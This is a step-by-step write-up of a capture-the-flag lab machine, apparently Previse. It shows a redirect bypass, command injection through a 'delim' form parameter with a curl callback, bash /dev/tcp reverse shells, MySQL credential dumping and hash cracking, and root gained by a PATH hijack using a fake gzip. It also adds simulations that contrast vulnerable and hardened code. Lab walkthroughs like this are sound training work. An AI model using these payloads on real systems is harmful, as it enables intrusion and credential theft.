Let's start with an Nmap service scan:
nmap -sV 10.129.95.185
Let's open the site in a browser, then enumerate directories and PHP files with gobuster:
gobuster dir -u 10.129.95.185 -w /usr/share/dirb/wordlists/common.txt -x .php
Go to http://10.129.95.185/nav.php
Open Burp, go to the Proxy tab and turn Intercept on.
Return to the website and click on "Create account".
Go back to the Proxy tab. On the intercepted request, click Action --> Do intercept --> Response to this request, then click Forward.
In the intercepted response, change the status line "302 Found" to "200 OK".
Click Forward.
This time we get access to the page to create a new account! This works because the server already sends the full page body along with the 302; only the browser following the Location header hides it, so the redirect is not an access control at all.
Turn Intercept off in Burp.
So let's create an account:
username : hello123
password : hello123
Click on Create user.
We are redirected to the login page.
Let's log in with our new account.
We are in!
Go to Files.
There is a file there; click on it to download it.
It is an archive; check out all the files in it.
Check config.php.
We got credentials to access a MySQL database!
username: root
password: mySQL_p@ssw0rd!:)
Go back to the website.
Under Management Menu --> Log Data, click Submit: we get a file with logs.
Let's use Burp to intercept the request that goes out when we click Submit to request the log data.
Go back to Management Menu --> Log Data.
Open Burp and, under the Proxy tab, turn Intercept on.
Go back to the website and click Submit.
Go back to Burp to see the intercepted request.
Now we append a command to the delim parameter. Basically we are replacing:
delim=comma
with:
delim=comma%26curl+http%3a//10.10.14.49%3a4444
URL-decoding the payload:
%26 -----> &
%3a -----> :
+ -----> space
Encoded:
delim=comma%26curl+http%3a//10.10.14.49%3a4444
Decoded:
delim=comma&curl http://10.10.14.49:4444
The & has to be sent as %26: the body is form-encoded, so a raw & would start a new parameter and the rest of the payload would never reach the delim value. Once decoded, the value evidently ends up in a shell command line: & terminates the application's own command and whatever follows runs on the server. To confirm that without needing to see any output, we make the target curl port 4444 on our VM and watch for the connection. Decoded, the injected command is:
curl http://10.10.14.49:4444
Before forwarding anything, open a new terminal on your VM and start a netcat listener on that port:
nc -lnvp 4444
Now that netcat is listening and the intercepted request has its delim value modified, click Forward in Burp, and Forward again if a second message is held.
It worked: the listener receives a connection from the target, which proves the injected command ran.
Stop the netcat listener on port 4444 for now with Ctrl+C.
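As an added example that is not part of the original walkthrough, the constructed script below walks the payload above through the steps the server performs (split the form body on &, URL-decode each value) and puts a simulated vulnerable export handler next to an allowlisted one. The handler bodies, the parameter handling and the use of echo in place of curl are assumptions; the page does not show the server-side code.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): constructed simulation
# of the delim command injection. Handler strings are assumptions; the real
# server-side code is not reproduced on the page.

# Encode a value for an application/x-www-form-urlencoded body the way Burp
# does: space -> '+', anything outside the unreserved set -> %hh (lowercase).
urlencode() {
    local s="$1" c
    while [ -n "$s" ]; do
        c=${s%"${s#?}"}          # first character
        s=${s#?}                 # remainder
        case "$c" in
            [a-zA-Z0-9._~/-]) printf '%s' "$c" ;;
            ' ')              printf '+' ;;
            *)                printf '%%%02x' "'$c" ;;
        esac
    done
}

# Reverse of the above: what the web server does to each parameter value.
urldecode() {
    local s="$1" out='' c hh
    while [ -n "$s" ]; do
        c=${s%"${s#?}"}; s=${s#?}
        case "$c" in
            +) out="$out " ;;
            %) hh=${s%"${s#??}"}; s=${s#??}
               out="$out$(printf "\\$(printf '%03o' "0x$hh")")" ;;
            *) out="$out$c" ;;
        esac
    done
    printf '%s' "$out"
}

# The server splits the raw body on a literal '&' BEFORE decoding, so an
# unencoded '&' in the payload starts a new parameter instead of reaching the
# shell. Prints the decoded value of the delim parameter.
extract_delim() {
    printf '%s\n' "$1" | tr '&' '\n' | while IFS='=' read -r k v; do
        if [ "$k" = delim ]; then
            urldecode "$v"
            echo
        fi
    done
}

# Vulnerable pattern (assumed, for illustration): the delimiter is spliced
# into a command line and handed to a shell, so '&' ends the intended
# command and whatever follows runs as the web server user.
vulnerable_export() {
    sh -c "printf 'exporting log with delim=%s\n' $1"
}

# Hardened pattern: map the accepted names to their characters and reject
# everything else; no shell ever sees the user-controlled string.
hardened_export() {
    local sep
    case "$1" in
        comma) sep=',' ;;
        space) sep=' ' ;;
        tab)   sep=$(printf '\t') ;;
        *)     printf 'rejected delim: %s\n' "$1" >&2; return 1 ;;
    esac
    printf 'exporting log with delim=%s\n' "$sep"
}

# Walk the page's payload through the pipeline, with echo standing in for
# curl so this runs offline.
payload="comma&echo INJECTED"
body="delim=$(urlencode "$payload")"               # delim=comma%26echo+INJECTED
vulnerable_export "$(extract_delim "$body")"      # INJECTED is printed too
hardened_export "$(extract_delim "$body")" || echo "hardened handler refused it"
```

Sending the same payload with a raw & instead of %26 makes extract_delim return just "comma": the injection is silently dropped, which is the usual reason a payload that looks right in the decoder "does nothing" on the wire.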
Now let's do it all over again, this time injecting a call to /bin/bash to get a reverse shell on port 6666.
Start a new listener with nc -lnvp 6666
Change the parameter from:
delim=comma
to:
delim=comma%26/bin/bash+-c+'bash+-i+>+/dev/tcp/10.10.14.49/6666+0>%261'
Decoded, it means:
delim=comma&/bin/bash -c 'bash -i > /dev/tcp/10.10.14.49/6666 0>&1'
Note the second %26: the & in 0>&1 is part of the value too and must be encoded for the same reason as the first one.
Click Forward in Burp.
We get a shell on the listener!
Type id to see which user we are running as.
As usual, let's upgrade it to a proper TTY by typing:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Earlier we found the database credentials in config.php.
From the shell, let's connect to the MySQL database with:
mysql -u root -p
When prompted for the password, type the one found in the file at the beginning:
mySQL_p@ssw0rd!:)
We are in!
show databases;
use previse;
show tables;
SELECT * FROM accounts;
The accounts table holds the password hash for m4lwhere:
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
The $1$ prefix marks it as md5crypt, and the salt between the second and third $ really does contain the 🧂 emoji, so copy the hash byte for byte (a mangled salt will never crack).
Save the hash into a file called hashed.txt.
We can use hashcat to recover the password (mode 500 is md5crypt):
hashcat -m 500 hashed.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt
This might take a few minutes; the estimated time shown is about 14 minutes. Just wait.
Press s if you want to see the status.
Finished! We got the password:
ilovecody112235!
Done! We have the password for m4lwhere.
We know from the Nmap scan at the very beginning that port 22 (SSH) is open, so let's SSH to the target as m4lwhere with the password we just cracked:
ssh m4lwhere@10.129.95.185
When prompted for the password, type:
ilovecody112235!
It worked and we are in!
ls
cat user.txt
You got the user flag! Congratulations!
As usual, let's check what we can run with sudo:
sudo -l
When prompted for m4lwhere's password, type:
ilovecody112235!
We find that the user m4lwhere can run the following command as root on Previse:
(root) /opt/scripts/access_backup.sh
Let's first look at what this script does:
cat /opt/scripts/access_backup.sh
It calls gzip by name rather than by absolute path, so the gzip that runs is whichever one comes first in the caller's PATH. Check where it normally resolves:
which gzip
We can put our own gzip earlier in the PATH:
cd /tmp
echo "bash -i >& /dev/tcp/10.10.14.49/9080 0>&1" > gzip
This creates a file called gzip in /tmp that contains just:
bash -i >& /dev/tcp/10.10.14.49/9080 0>&1
chmod +x gzip
This makes our new gzip file executable.
export PATH=/tmp:$PATH
This puts /tmp at the front of the PATH. Note that this only works because sudo passes our PATH through for this command; if the sudo -l output listed env_reset with a secure_path, sudo would replace PATH and our fake gzip would never be found.
Open a new terminal on your VM and type:
nc -lnvp 9080
Now go back to the m4lwhere@previse shell and type:
sudo /opt/scripts/access_backup.sh
When you return to your netcat listener, you get a shell, and we are root!
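As an added example that is not part of the original walkthrough, the constructed script below reproduces the PATH hijack in a throwaway directory: a stand-in "system" gzip, a fake gzip in an attacker-writable directory, a backup script that calls gzip by bare name (mirroring access_backup.sh, whose contents are not reproduced on the page) and a hardened version that pins its own PATH. The file names and the echo payloads are assumptions.

```shell
#!/bin/sh
# Added example (not part of the original walkthrough): self-contained
# demonstration of the PATH hijack used against access_backup.sh. The two
# gzip scripts and the backup commands are constructed stand-ins.
set -u

DEMO=$(mktemp -d "${TMPDIR:-/tmp}/pathdemo.XXXXXX")
trap 'rm -rf "$DEMO"' EXIT
mkdir -p "$DEMO/sys" "$DEMO/tmp"

# Stand-in for the system gzip the script's author expected to run.
printf '#!/bin/sh\necho real-gzip\n' > "$DEMO/sys/gzip"
# Attacker's gzip in a writable directory: this is where the reverse shell
# one-liner from the walkthrough would go.
printf '#!/bin/sh\necho HIJACKED\n' > "$DEMO/tmp/gzip"
chmod +x "$DEMO/sys/gzip" "$DEMO/tmp/gzip"

# Vulnerable: the script calls gzip by bare name, so whatever PATH the caller
# brings in decides which gzip runs. Mirrors
# 'export PATH=/tmp:$PATH; sudo /opt/scripts/access_backup.sh' when sudo
# does not reset PATH.
run_vulnerable_backup() {
    PATH="$DEMO/tmp:$DEMO/sys" /bin/sh -c 'gzip'
}

# Hardened: the script sets PATH itself (calling /bin/gzip by absolute path
# is equivalent), so the caller's PATH is ignored. sudo's env_reset with
# secure_path gives the same protection one layer up.
run_hardened_backup() {
    PATH="$DEMO/tmp:$DEMO/sys" /bin/sh -c "PATH=$DEMO/sys; export PATH; gzip"
}

# Which gzip does a given PATH resolve to? Worth checking before starting
# the listener: if this does not point at the fake, the hijack will not fire.
resolve_gzip() {
    ( PATH="$1"; export PATH; command -v gzip )
}

run_vulnerable_backup                 # HIJACKED
run_hardened_backup                   # real-gzip
resolve_gzip "$DEMO/tmp:$DEMO/sys"    # .../tmp/gzip
```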
cd /root
ls
cat root.txt
Congratulations! You got the root flag!
Thanks!!